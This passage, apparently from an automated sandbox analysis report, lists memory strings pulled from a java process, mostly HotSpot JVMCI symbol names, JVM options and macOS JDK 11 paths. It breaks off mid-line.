          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIEnv::dependencies_failed
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN16JVMCIKlassHandleC1EP6ThreadP5Klass
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN5ciEnv12_JVMCI_klassE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN8JVMCIEnv45get_instance_klass_for_declared_method_holderEP5Klass
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCICountersExcludeCompiler
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::test_deoptimize_call_int
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime12monitorenterEP10JavaThreadP7oopDescP9BasicLock
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN22HotSpotCompiledNmethod12set_jvmciEnvEP8_jobjectl
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler15supports_nativeEv
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_new_multi_array
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler4nameEv
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCIRuntime::throw_and_post_jvmti_exception
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCI Compiler does not support selected GC
          Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmpBinary or memory string: ,java.property.java.home/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home
          Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmpBinary or memory string: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/lib
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCI
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: forcing TieredStopAtLevel to full optimization because JVMCI is enabled
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime10log_objectEP10JavaThreadP7oopDescbb
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_log_printf
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime29_HotSpotJVMCIRuntime_instanceE
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: _JVMCIPrintProperties
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN13JVMCICompiler12supports_osrEv
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime10vm_messageEhllll
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_thread_is_interrupted
          Source: java, 00000555.00000246.9.00000001025db000.00000001025e3000.rw-.sdmpBinary or memory string: /Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: JVMCICounterSize
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12JVMCIRuntime20dynamic_new_instanceEP10JavaThreadP7oopDesc
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_write_barrier_post
          Source: java, 00000555.00000246.9.000000010338a000.0000000103749000.r--.sdmpBinary or memory string: __ZN12CompilerToVM14get_jvmci_typeER16JVMCIKlassHandleP6Thread
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_monitorenter
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: guarantee(can_initialize_JVMCI()) failed
          Source: java, 00000555.00000246.1.0000000102a00000.0000000103234000.r-x.sdmpBinary or memory string: _aot_jvmci_runtime_identity_hash_code
          Source: java, 00000555.00000246.1.0000000102a0000